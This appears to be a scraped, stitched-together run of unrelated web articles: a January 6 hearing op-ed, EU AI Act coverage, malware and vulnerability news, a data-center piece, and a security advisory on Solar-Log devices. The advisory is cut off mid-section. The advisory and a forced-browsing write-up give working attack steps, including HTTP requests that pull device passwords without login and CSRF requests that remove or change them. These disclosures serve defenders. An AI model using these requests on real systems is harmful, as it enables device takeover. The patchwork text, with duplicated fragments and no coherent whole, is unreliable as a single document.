The House committee's televised hearings interrogate the Capitol attack with damning new evidence. Whether it's enough to prevent another one is uncertain.

It’s hard to tell which fact should shock us most out of the first, surprisingly compelling public hearing of the congressional committee investigating the insurrection at the US Capitol on January 6.

Jared Kushner brushing aside as mere “whining” the repeated resignation threats from White House counsel and its top lawyers in the face of Donald Trump’s ongoing push to overturn the election?

The fact that even as rioters surged through the Capitol and members of Congress fled in terror, Donald Trump, the president of the United States, never once spoke to any corner of the US government to ask for help—never once called the Justice Department, Homeland Security, or the Pentagon?

The committee’s allegations that members of Congress sought presidential pardons for their own roles in the January 6 events?  

Or the simple power of a brave police officer talking about our nation’s most sacred democratic space as a “war zone” and how—repeatedly injured by the rioters that the GOP has sought in the last 18 months to reframe as “normal tourists” engaged in “legitimate political discourse”—she slipped on others’ blood spread across the steps of the US Capitol? 

After months of behind-the-scenes investigation, wide-ranging subpoenas, witness depositions, document reviews, countless hours of reviewing video footage, and delicate internal political machinations, the public portion of the House’s January 6 select committee kicked off Thursday night with a two-hour blockbuster that immediately established the stakes of the work—the former president of the United States attempted nothing less than a coup to remain in power—and recentered its work as one of the most important political investigations in our lifetime.

Committee vice-chair Rep. Liz Cheney, a Wyoming Republican who has been excoriated by her own party for agreeing to participate in the investigation alongside Republican Rep. Adam Kinzinger of Illinois, provided a captivating introduction and overview of the events of January 6, 2021. She also highlighted what the committee will explore over the course of roughly a half-dozen hearings this month and immediately gave the lie to GOP dismissals of the investigation as nothing more than a political witch hunt.

The skillful—and politically courageous—presentation by Cheney, followed up by multiple video segments produced by the committee, highlights the coordination among armed, white nationalist militia groups like the Proud Boys and Oath Keepers, as well as the singular role Donald Trump played in stoking lies that the election had been stolen and then inviting his supporters to come to Washington on January 6 to protest—protests that quickly escalated into a brutal, violent assault on the Capitol that had lawmakers fleeing for their lives. One of the most powerful video clips showed staffers of Republican leader Kevin McCarthy—who has long downplayed the Capitol assault—evacuating their House offices in terror. Other clips showed the crowd chanting, “Hang Mike Pence” and insurrectionists screaming in the face of police to demand that they hand over House speaker Nancy Pelosi. Cheney closed her poised and pointed presentation with a warning to the hundreds of her GOP colleagues who have excused the events of 1/6: “There will come a day when Donald Trump is gone, but your dishonor will remain.”

Committee chair Rep. Bennie Thompson, Democrat of Mississippi, outlined how future hearings would focus on the particulars of the conspiracy and the careful construction of Trump’s knowing lies—committee members explained that they saw in Trump’s behavior a “sophisticated” seven-step plan for overturning the election—but Thursday’s hearing mostly focused on reminding Americans of the stakes involved. This was no ordinary political protest. This was no ordinary election loss. The actions of Donald Trump before, during, and after the January 6 Capitol assault instead marked an end to America’s 240-year tradition of peaceful transitions of presidential power.

Instead, Donald Trump embarked on a concerted effort to use the tools of the presidency and the US government to overturn the legitimate, authentic election results—even though his own staff told him, according to their depositions aired Thursday in the hearing, that “there was no there there.”

First Trump lied to the public. Then he tried to weaponize the Justice Department to back his lies. He pressured state election officials and legislators to embrace far-fetched legal theories and change their states’ election results. His team worked to invent and send to Washington invalid slates of electors, in the hopes that Congress would recognize them and allow him to overturn his loss. He summoned supporters and encouraged armed groups to join him in DC on January 6, promising in a tweet that it “will be wild.” Then he pressured Vice President Mike Pence to violate his constitutional oath and refuse to certify the valid election results ahead of January 6. And lastly, he seemingly refused to lift a finger—either to place a telephone call or send a tweet—to summon federal aid as the Capitol and legislative branch remained under violent assault for hours. Instead, according to the committee, only Vice President Pence—himself hiding at a secure loading dock inside the Capitol complex after being hastily evacuated from the Senate chamber above—contacted the military and ordered them to respond and secure the Capitol.

Taken together, it is the most audacious, calculated, and unconstitutional plot America has faced in its history—one that came far closer to success than anyone imagined.

Over the course of those two hours, the committee succeeded in reframing the national conversation and focused on the true horror of January 6. In doing so, it surely raised the pressure on the Justice Department, which is conducting a seemingly slow-moving parallel investigation that has seen hundreds of low-level indictments and charges against January 6 rioters—including the arrest just yesterday of a GOP gubernatorial candidate in Michigan—and a number of more serious “seditious conspiracy” indictments against Oath Keepers and Proud Boys leaders. Thus far, it has stopped short of penetrating Donald Trump’s motley collection of enablers, grifters, and hangers-on.

Despite the shocking clarity of the committee’s opening presentation, it remains uncertain at best whether it will be able to break through America’s political polarization and its increasingly separate-and-unequal media ecosystems. Fox News, alone among the major networks, refused to air the hearings live and instead allowed its host Tucker Carlson, who increasingly features openly white nationalist positions, to spew venom to his millions of prime-time viewers during an hour-long show, unusually uninterrupted by commercials.

In many ways, Fox’s decision to double down on Tucker Carlson’s lies Thursday night is unsurprising. The network’s decision in the weeks after the 2020 election—as Donald Trump built up the Big Lie and set the kindling for January 6—to embrace Trump’s lies and undermine the legitimacy of then-President-elect Joe Biden’s victory makes it all but an unindicted co-conspirator in the violence on Capitol Hill.

The challenge America now faces, heading into next week’s follow-up hearings, is that none of us know what part of Donald Trump’s story we’re living in—the beginning, the middle, or the end? The committee’s work ahead is to convince America to view January 6 as a turning point, not a warning that we will later say went ignored.

There’s a saying, after all, that there’s no such thing as an unsuccessful coup. An unsuccessful coup is just practice.

The January 6 Hearing Was a Warning

The commission argues that legislative action is needed to ensure a well-functioning market for AI systems that balances benefits and risks.

The European Commission (EC) is currently debating new rules and actions for trust and accountability in artificial intelligence (AI) technology through a legal framework called the EU AI Act. Its aim is to promote the development and uptake of AI while addressing potential risks some AI systems can pose to safety and fundamental rights.

While most AI systems will pose low to no risk, the EU says, some create dangers that must be addressed. For example, the opacity of many algorithms may create uncertainty and hamper effective enforcement of existing safety and rights laws.

The EC argues that legislative action is needed to ensure a well-functioning internal market for AI systems where both benefits and risks are adequately addressed.

"The EU AI Act aims to be a human centric legal-ethical framework that intends to safeguard and protect human rights and fundamental freedoms from violations of these rights and freedoms by algorithms and smart machines," says Mauritz Kop, Transatlantic Technology Law Forum Fellow at Stanford Law School and strategic intellectual property lawyer at AIRecht.

The right to know whether you are dealing with a human or a machine — which is becoming increasingly more difficult as AI becomes more sophisticated — is part of that vision, he explains.

Kop notes that AI is now mostly unregulated, except for a few sector-specific rules. The act aims to address the legal gaps and loopholes by introducing a product safety regime for AI.

"The risks are too high for nonbinding self-regulation by companies alone," he says.

**Effects on AI Innovation**

Kop admits that regulatory conformity and legal compliance will be a burden, especially for early AI startups developing high-risk AI systems. Empirical research that shows the GDPR – while preserving privacy and data protection and data security – had a negative effect on innovation, he notes.

Risk classification for AI is based on the intended purpose of the system, in line with existing EU product safety legislation. Classification depends on the function the AI system performs and on the specific purpose and modalities for which the system is used.

"The legal uncertainty surrounding \[regulation\] and the lack of budget to hire specialized lawyers or multidisciplinary teams still are significant barriers for a flourishing AI startup and scale-up ecosystem," Kop says. "The question remains whether the AI Act will improve or worsen the startup climate in the EU."

The EC will determine which AI gets classified as "high risk" using criteria that are still under debate, creating a list of examples of high-risk systems to help guide judgment.

"It will be a dynamic list that contains various types of AI applications used in certain high-risk industries, which means the rules get stricter for riskier AI in healthcare and defense than they are for AI apps in tourism," Kop says. "For instance, medical AI is \[classified as\] high risk to prevent direct harm to patients due to AI errors."

He notes there is still controversy about the criteria and definition of AI that the draft uses. Some commentators argue it should be more technology-specific, aimed at certain riskier types of machine learning, such as deep unsupervised learning or deep reinforcement learning.

"Others focus more on the intent of the system, such as social credit scoring, instead of potential harmful results, such as neuro-influencing," Kop added. "A more detailed classification of what 'risk' entails would thus be welcome in the final version of the act."

**Facial Recognition as a High-Risk Technology**

Joseph Carson, chief security scientist and advisory CISO at Delinea, participated in several of the talks around the act, including as a subject matter expert in the use of AI in law enforcement and articulating the concerns around security and privacy.

The EU AI Act, he says, will mainly affect those organizations that already collect and process personal identifiable information. Therefore, it will impact how they use advanced algorithms in processing the data.

"It is important to understand the risks if no regulation or act is in place and what the possible impact \[is\] if organizations abuse the combination of sensitive data and algorithms," Carson says. "The future of the Internet is a scary place, and the enforcement of the EU AI Act allows us to embrace the future of the Internet using AI with both responsibility and accountability."

Regarding facial recognition, he says the technology should be regulated and controlled.

"It has many amazing uses in society, but it must be something you opt in and agree to use; citizens must have a choice," he says. "If no act is in place, we will see a significant increase in deepfakes that will spiral out of control."

Malin Strandell-Jansson, senior knowledge expert at McKinsey & Co, says facial recognition is one of the most debated issues in the draft act, and the final outcome is not yet clear.

In its draft format, the AI Act strictly prohibits the use of real-time remote biometric identification in publicly accessible spaces for law enforcement purposes, as it poses particular risks for fundamental rights – notably human dignity, respect for private and family life, protection of personal data, and nondiscrimination.

Strandell-Jansson points out a few exceptions, including use for law enforcement purposes for the targeted search for specific potential victims of crime, including missing children; the response to the imminent threat of a terror attack; or the detection and identification of perpetrators of serious crimes.

"Regarding private businesses, the AI Act considers all emotion recognition and biometric categorization systems to be high-risk applications if they fall under the use cases identified as such — for example, in the areas of employment, education, law enforcement, migration, and border control," she explains.

As such, potential providers would have to subject such AI systems to transparency and conformity obligations before putting them on the market in Europe.

**The Time to Act on AI Is Now**

Dr. Sohrob Kazerounian, AI research lead at Vectra, an AI cybersecurity company, says the need to create a regulatory framework for AI has never been more pressing.

"AI systems are rapidly being integrated into products and services across wide-ranging markets," he says. "Yet the trustworthiness and interpretability of these systems can be rather opaque, with poorly understood risks to users and society more broadly."

While some existing legal frameworks and consumer protections may be relevant, applications that use AI are sufficiently different enough from traditional consumer products that they necessitate fundamentally new legal mechanisms, he adds.

The overarching goal of the bill is to anticipate and mitigate the most critical risks resulting from the use and failure of AI, with actions ranging from banning systems deemed to have "unacceptable risk" altogether to heavy regulation of "high-risk" systems. Another, albeit less-noted, consequence of the framework is that it could provide clarity and certainty to markets about what regulations will exist and how they will be applied.

"As such, the regulatory framework may in fact result in increased investment and market participation in the AI sector," Kazerounian said.

**Limits for Deepfakes and Biometric Recognition**

By addressing specific AI use cases, such as deepfakes and biometric or emotional recognition, the AI Act is hoping to ameliorate the heightened risks such technologies pose, such as violation of privacy, indiscriminate or mass surveillance, profiling and scoring of citizens, and manipulation, Strandell-Jansson says.  

"Biometrics for categorization and emotion recognition have the potential to lead to infringements of people's privacy and their right to the protection of personal data as well as to their manipulation," she says. "In addition, there are serious doubts as to the scientific nature and reliability of such systems."

The bill would require people to be notified when they encounter deepfakes, biometric recognition systems, or AI applications that claim to be able to read their emotions. Although that's a promising step, it raises a couple of potential issues.

Overall, Kazerounian says it is "undoubtedly" a good start to require increased visibility for consumers when they are being classified by biometric data and when they are interacting with AI-generated content rather than real humans or real content.

"Unfortunately, the AI act specifies a set of application areas within which the use of AI would be considered high-risk, without necessarily discussing the risk-based criteria that could be used to determine the status of future applications of AI," he said. "As such, the seemingly ad-hoc decisions about which application areas are considered high-risk simultaneously appear to be too specific and too vague."

Current high-risk areas include certain types of biometric identification, operation of critical infrastructure, employment decisions, and some law enforcement activities, he explains.

"Yet it isn't clear why only these areas were considered high-risk and furthermore doesn't delineate which applications of statistical models and machine-learning systems within these areas should receive heavy regulatory oversight," he adds.

**Possible Groundwork for Similar US Law**

It is unclear what this act could mean for a similar law in the US, Kazerounian says, noting that it has now been more than half a decade since the passing of GDPR, the EU law on data regulation, without any similar federal laws following in the US — yet.

"Nevertheless, GDPR has undoubtedly influenced the behavior of multinational corporations, which have either had to fracture their policies around data protections for EU and non-EU environments or simply have a single policy based on GDPR applied globally," he said. "In any case, if the US decides to propose legislation on the regulation of AI, at a minimum it will be influenced by the EU act."

EU Debates AI Act to Protect Human Rights, Define High-Risk Uses

So-called Symbiote malware, first found targeting financial institutions, contains stealthy rootkit capabilities.

A new malware variant attacking Linux systems that steals credentials and allows for remote access to victim machines camouflages so well that the researchers studying it say they can't conclude if it's being used in targeted or larger-scale attack campaigns.

Security researchers from Intezer and BlackBerry's Research & Intelligence Team say the so-called Symbiote malware is unusual in that it's not a pure executable file: it's actually a shared object library that loads itself into a machine's running processes using the LD\_Preload file in Linux. "Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability," the researchers wrote in a blog post this week.

Symbiote was first sighted in November of 2021, they said, and at the time appeared to be created for attacking financial institutions in Latin America.

"Once the malware has infected a machine, it hides itself and any other malware used by the threat actor, making infections very hard to detect. Performing live forensics on an infected machine may not turn anything up since all the file, processes, and network artifacts are hidden by the malware. In addition to the rootkit capability, the malware provides a backdoor for the threat actor to log in as any user on the machine with a hardcoded password, and to execute commands with the highest privileges," the researchers wrote.

While detecting the rootkit is a major challenge, the researchers said organizations should watch for anomalous DNS requests. But relying on antivirus and endpoint detection and response tools to detect it is moot: They can be compromised by the rootkit since it's embedded in "userland," the researchers warned.  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

New Linux Malware 'Nearly Impossible to Detect'

A new research undertaken by a group of academics from the University of California San Diego has revealed for the first time that Bluetooth signals can be fingerprinted to track smartphones (and therefore, individuals).
The identification, at its core, hinges on imperfections in the Bluetooth chipset hardware introduced during the manufacturing process, resulting in a "unique physical-layer

A new research undertaken by a group of academics from the University of California San Diego has revealed for the first time that Bluetooth signals can be fingerprinted to track smartphones (and therefore, individuals).

The identification, at its core, hinges on imperfections in the Bluetooth chipset hardware introduced during the manufacturing process, resulting in a "unique physical-layer fingerprint."

"To perform a physical-layer fingerprinting attack, the attacker must be equipped with a Software Defined Radio sniffer: a radio receiver capable of recording raw IQ radio signals," the researchers said in a new paper titled "Evaluating Physical-Layer BLE Location Tracking Attacks on Mobile Devices."

The attack is made possible due to the ubiquitous nature of Bluetooth Low Energy (BLE) beacons that are continuously transmitted by modern devices to enable crucial functions such as contact tracing during public health emergencies.

The hardware defects, on the other hand, stem from the fact that both Wi-Fi and BLE components are often integrated together into a specialized "combo chip," effectively subjecting Bluetooth to the same set of metrics that can be used to uniquely fingerprint Wi-Fi devices: carrier frequency offset and IQ imbalance.

Fingerprinting and tracking a device then entails extracting CFO and I/Q imperfections for each packet by computing the Mahalanobis distance to determine "how close the features of the new packet" are to its previously recorded hardware imperfection fingerprint.

"Also, since BLE devices have temporarily stable identifiers in their packets \[i.e., MAC address\], we can identify a device based on the average over multiple packets, increasing identification accuracy," the researchers said.

That said, there are several challenges to pulling off such an attack in an adversarial setting, chief among them being that the ability to uniquely identify a device depends on the BLE chipset used as well as the chipsets of other devices that are in close physical proximity to the target.

Other critical factors that could affect the readings include device temperature, differences in BLE transmit power between iPhone and Android devices, and the quality of the sniffer radio used by the malicious actor to execute the fingerprinting attacks.

"By evaluating the practicality of this attack in the field, particularly in busy settings such as coffee shops, we found that certain devices have unique fingerprints, and therefore are particularly vulnerable to tracking attacks, others have common fingerprints, they will often be misidentified," the researchers concluded.

"BLE does present a location tracking threat for mobile devices. However an attacker's ability to track a particular target is essentially a matter of luck."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find Bluetooth Signals Can be Fingerprinted to Track Smartphones

A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL.

\# Exploit Title: Privilege Escalation via Forced Browsing

\# Google Dork: NA

\# Date: 11/03/2022

\# Exploit Author: Ali J.

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

\# Version: 1.0

\# Tested on: Windows 10

\# CVE : CVE-2021-44582

Steps to Reproduce:

1\. Login to the Money Transfer Management System with admin credentials and copy the URL.

2\. Logout from the admin role and login with the normal user credentials, observe the available modules on the left side.

3\. Paste the admin URL and observe that the application is vulnerable to Privilege Escalation via Forced Browsing.

CVE-2021-44582: CVE-2021-44582/Privilege Escalation via Forced Browsing in Sourcecodester Money Transfer Management System at main · warmachine-57/CVE-2021-44582

Sysadmins should update their installations immediately

Jessica Haworth 10 June 2022 at 12:34 UTC

Sysadmins should update their installations immediately

Two flaws in the web interface of a Fujitsu cloud storage system could allow an unauthenticated attacker to read, write, and destroy backed up files.

The security vulnerabilities were present in the enterprise-grade Fujitsu Eternus CS8000 (Control Center) V8.1.

Researchers from NCC Group found two separate issues due to a lack of user input validation in two PHP scripts, which are normally included post-authentication.

Both flaws, a command injection in and a command injection in , could allow an attacker to gain remote code execution on the appliance without prior authentication or authorization.

Read more of the latest web security research here

As no include-guards are in-place, the attacker is able to trigger the script without prior authentication by calling it directly.

This would enable them to take control over the appliance as if they were logged in directly via a secure shell.

“If exploited, the attacker obtains limited user privileges on the machine as the ‘www-data’ user; however, it should be noted that the Kernel on the system which NCC Group’s Fox-IT encountered is severely outdated, allowing an attacker to easily escalate their privileges to the administrative ‘root’ user of the system,” a blog post from NCC Group reads.

“Due to the sensitive nature of the system, any attacker with full control over the system is potentially able to read, modify and potentially destroy the entire virtual backup tapes, which could be used as an initial stage of a ransomware attack to ensure the victim is not able to recover and is forced to pay the ransom.”

**Patch now**

The issues were discovered during a penetration test conducted by NCC Group on behalf of a client. They were then reported to Fujitsu, which has since patched the bugs (PDF).

Fujitsu said it has “no knowledge” of any working exploit code, and has seen no successful attempts to exploit the vulnerabilities in the wild.

NCC Group advised users to upgrade to the latest version of the software immediately. It has also listed other recommendations to mitigate the bugs in the blog post.

The Daily Swig has reached out to both NCC Group and Fujitsu for comment and will update this article accordingly.

DON’T MISS Chinese cyber threat actors are widely abusing well-known attacks to infiltrate networks, CISA warns

Separate Fujitsu cloud storage vulnerabilities could enable attackers to destroy virtual backups

The dangerous malware appears to be well and truly back in action, sporting new variants and security-dodging behaviors in a wave of recent phishing campaigns.

The dangerous malware appears to be well and truly back in action, sporting new variants and security-dodging behaviors in a wave of recent phishing campaigns.

Emotet’s resurgence in April seems to be the signal of a full comeback for what was once dubbed “the most dangerous malware in the world,” with researchers spotting various new malicious phishing campaigns using hijacked emails to spread new variants of the malware.

The “new and improved” version of Emotet is exhibiting a “troubling” behavior of effectively collecting and using stolen credentials, “which are then being weaponized to further distribute the Emotet binaries,” Charles Everette from Deep Instinct revealed in a blog post this week.

“\[Emotet\] still utilizes many of the same attack vectors it has exploited in the past,” he wrote. “The issue is that these attacks are getting more sophisticated and are bypassing today’s standard security tools for detecting and filtering out these types of attacks.”

In April, Emotet malware attacks returned after a 10-month “spring break” with targeted phishing attacks linked to the threat actor known as TA542, which since 2014 has leveraged the Emotet malware with great success, according to a report by Proofpoint.

These attacks—which were being leveraged to deliver ransomware—came on the back of attacks in February and March hitting victims in Japan using hijacked email threads and then “using those accounts as a launch point to trick victims into enabling macros of attached malicious office documents,” Deep Instinct’s Everette wrote.

“Looking at the new threats coming from Emotet in 2022 we can see that there has been an almost 900 percent increase in the use of Microsoft Excel macros compared to what we observed in Q4 2021,” he wrote.

**Emotet Rides Again**

The attacks that followed in April targeted new regions beyond Japan and also demonstrated other characteristics signaling a ramp-up in activity and rise in sophistication of Emotet, Deep Instinct noted.

Emotet, like other threat groups, continues to leverage a more than 20-year-old Office bug that was patched in 2017, CVE-2017-11882, with nearly 20 percent of the samples that researchers observed exploiting this flaw. The Microsoft Office Memory corruption vulnerability allows an attacker to perform arbitrary code execution.

Nine percent of the new Emotet threats observed were never seen before, and 14 percent of the recent emails spreading the malware bypassed at least one email gateway security scanner before it was captured, according to Deep Instinct.

Emotet still primarily uses phishing campaigns with malicious attachments as its transportation of choice, with 45 percent of the malware detect using some type of Office attachment, according to Deep Instinct. Of these attachments, 33 percent were spreadsheets, 29 percent were executables and scripts, 22 percent were archives and 11 percent were documents.

Other notable changes to Emotet’s latest incarnation is its use of  64-bit shell code, as well as more advanced PowerShell and active scripts in attacks, according to Deep Instinct.

****History of a Pervasive Threat****

Emotet started its nefarious activity as a banking trojan in 2014, with its operators having the dubious honor of being one of the first criminal groups to provide malware-as-a-service (MaaS), Deep Instinct noted.

The trojan evolved over time to become a full-service threat-delivery mechanism, with the ability to install a collection of malware on victim machines, including information stealers, email harvesters, self-propagation mechanisms and ransomware. Indeed, Trickbot and the Ryuk and Conti ransomware groups have been habitual partners of Emotet, with the latter using the malware to gain initial entry onto targeted systems.

Emotet appeared to be put out of commission by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. But as often happens with cybercriminal groups, its operators have since regrouped and seem to be working once again at full power, researchers said.

In fact, in November 2021 when Emotet emerged again nearly a year after it went dark, it was on the back of its collaborator Trickbot. A team of researchers from Cryptolaemus, G DATA and AdvIntel separately observed the trojan launching a new loader for Emotet, signaling its return to the threat landscape.

Potent Emotet Variant Spreads Via Stolen Email Credentials

By Owais Sultan
Hyperconverged infrastructure is changing the way data centers work for the better. Learn about the benefits of hyperconverged…
This is a post from HackRead.com Read the original post: Hyperconverged Infrastructure (HCI) is Changing Data Centers

****Hyperconverged infrastructure is changing the way data centers work for the better. Learn about the benefits of hyperconverged infrastructure.****

Every year there is a huge number of technological reforms and upgrades that can make life easier for both individuals and companies. Sometimes, large-scale changes also affect the data processing centers.

If even more than 10 years ago data center managers worked with traditional infrastructure familiar to everyone, then in recent years there have been big changes. These changes were the use of networks that provide both speed and availability (software-defined networks), a distributed information technology architecture in which customer data is processed at the edge of the network, as close as possible to the source (edge computing), the fifth generation of mobile communications, as well as artificial intelligence. 

Such technologies imply a major transformation in how data centers operate. However, the most important thing is that qualified specialists are needed to work with such technologies, which means higher requirements for data center managers. They must be able and know how to work with such innovative solutions, and explore and customize them. It would seem that the use of technology should be beneficial, but for people working with such innovations, this becomes a challenge. 

That is why the latest technology has been developed that promises to solve all these problems. 

**Table of Contents:**

1.  **Hyperconverged Infrastructure** 
2.  **Converged Infrastructure** 
3.  **Key Benefits of HCI**

**Hyperconverged Infrastructure **

Before describing all the advantages of technology, it is worth considering the hyperconverged infrastructure definition. HCI is a distributed infrastructure platform that combines servers, networks, and storage with sophisticated software to produce adaptable key components that may improve existing infrastructure.

The consistent building pieces required to establish a hyperconverged infrastructure can be acquired as a mix of electronic, electrical, and mechanical hardware or as virtual stacks.

Such an infrastructure consists of standard components: servers running on the x86 architecture, software for creating, running, and managing virtual machines, and special software needed for management.

The beauty of a hyperconverged data center is that if you need more processing power, you can easily scale the process. All you need to do is attach a few extra boxes, depending on how much you need to scale everything. Thus, each organization gets a great opportunity to improve the processing centers of HCI data. 

It is already clearly visible how quickly the demand for the creation of such data centers is growing. 3 years ago, the global market for such products and services was estimated at over $6 billion. In 5 years, it will be valued at more than $22 billion. Companies now must cut information technology expenses, drastically speed up the building of data centers, manage numerous operations, and grow swiftly.

**Converged Infrastructure **

There existed a converged infrastructure prior to the introduction of such an upgraded infrastructure. It comprises pre-engineered equipment and programs that professionals may purchase and install independently. In short, it’s like an IKEA crib. You get a set of ready-made components that you need to combine to get the finished product. That is, you get components that will be compatible with each other. You do not need to search for suppliers for each component to separately assemble everything you need. 

Hyperconverged infrastructure is a more advanced CI. This infrastructure already contains all the necessary components that you can work with. In simple words, if CI is an IKEA crib that needs to be assembled, then HCI is a prepackaged meal that you just need to heat.

If you use a similar infrastructure in your data center, then to increase the capacity, you only need to order more infrastructure units. Easy and simple scalability allows multiple companies to increase the volume of data processing, as well as quickly adapt to new company needs. 

**Key Benefits of HCI**

Scalability is the most important advantage of HCI. However, this is not all that such an infrastructure can offer. 

**Low-cost hyperconverged infrastructure units **

HCI requires x86 servers, which are installed in most modern data centers. Thus, companies do not need to spend money to buy the necessary servers. In addition, every time there is a need to add capacity, companies need to buy only one type of device instead of a huge variety of different devices. They can be purchased from a single supplier, which reduces the time of purchase and implementation.

In addition, if necessary, if there are difficulties with installation or updates, then you only need to seek technical assistance from one vendor instead of working with many different vendors. 

**Remote control **

Infrastructure components are handled as services in a software-defined data center. They can be managed and configured remotely, which greatly facilitates the work of managers. At any time of the day or night, managers can quickly reduce or increase the amount of storage, and memory, adjust computing power, as well as all the necessary resources. This means that managers will be able to update all resources used as soon as it is needed.  

**Achieving the greatest efficiency of all processes **

All used infrastructure resources are combined into clusters. If you need more memory for a particular process or application, or need more storage capacity and compute power, you can quickly identify those resources that aren’t already being used to provide what you need. With unified management, managers can quickly discover these resources, pool them together, and make them available for process or application execution when needed. 

**Integrated management **

You only need a single console to manage all the processes. Local and remote clusters can be managed from one place. Thus, the entire management process is greatly simplified. 

Companies operating in the field of IT have a chance to reduce the costs of IT departments, as well as increase their productivity. The work of specialists is facilitated since it is no longer necessary to think about how to deploy a system, integrate it, and separately maintain each component while solving other problems associated with managing the center. 

There is no need to expand the staff, as well as to attract consultants who charge a lot for their work. If your staff has generalists, then they will be able to do most of the work without help. 

**Conclusion **

There are many benefits to implementing hyperconverged infrastructure in your data center. The first and most important is the speed and ease of scaling, which is low cost. In addition, all processes can be controlled remotely using a single console. Achieving the greatest efficiency of all processes occurs quickly if necessary.

1.  Why Data Security is crucial?
2.  Big Data and Cybersecurity: Opportunity or Threat?
3.  How big data analytics helps enterprises improve cybersecurity
4.  Top Data-Driven Methods for Improving Your Investment Decisions
5.  Cybersecurity, Big Data & Automation Tools: What Marketers Need To Know

Hyperconverged Infrastructure (HCI) is Changing Data Centers

A vulnerability classified as problematic was found in Solare Solar-Log 2.8.4-56/3.5.2-85. Affected by this vulnerability is an unknown functionality of the component Config Handler. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices**

_From_: SEC Consult Vulnerability Lab <research () sec-consult com>  
_Date_: Wed, 22 Mar 2017 10:21:27 +0100  

SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Solare Datensysteme GmbH
                     Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
      fixed version: Firmware 3.5.3-86
         CVE number: -
             impact: Critical
           homepage: http://www.solar-log.com/de/home.html
              found: 2017-01-23
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLog™" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."

Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html

Business recommendation:
------------------------
SEC Consult recommends to immediately install the available firmware update
and restrict network access.

Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.

An attacker can download the configuration file without authentication and
extract the password to login to Solar-Log. Therefore, an attacker can gain
administrative access to such a device without prior authentication.


2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.

A CSRF vulnerability enables an attacker to remove/modify a password of a
device by luring an authenticated user to click on a crafted link. An attacker
is able to take over the device by exploiting this vulnerability.


3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.

Any files can be uploaded on the Solar-Log by using a crafted POST request. An
attacker can start a malicious website or use the Solar-Log as share to store
any (illegal) contents.


4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)

The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.

All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.


5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

Since the Solar-Log is based on the chips of Beck IPC a UDP configuration
server is enabled by default. This server allows to change the IP configuration
over a specific UDP port. This functionality can be protected with a password,
but this is not set in the affected firmware versions.

The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.


6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

The Beck IPC UDP configuration server on Solar-Log device can be attacked with
arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.


7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)

Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip
over the network via UDP, a missing password can also enable an attacker to do
this on a Solar-Log device. This action can lead to a simple Denial of Service
or a complex botnet of Solar-Log devices!


Proof of concept:
-----------------
1) Unauthenticated Download of Configuration including Device-Password
The full configuration is exposed by sending the following GET-request:
-------------------------------------------------------------------------------
GET /data/misc.dat HTTP/1.1
Host: <IP-Address>
\[...\]
-------------------------------------------------------------------------------
Since the response contains the password, an attacker can easily take
control over the device.


2) Cross-Site Request Forgery
By luring the user to issue the following request, the password is removed:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------

By luring the user to issue the following request, the password is modified:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=none;postval=105;{"221":"0","223":"1","224":"<New-Password>","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------


3) Unauthenticated Arbitrary File Upload
Any files can be uploaded by using the following POST-request:
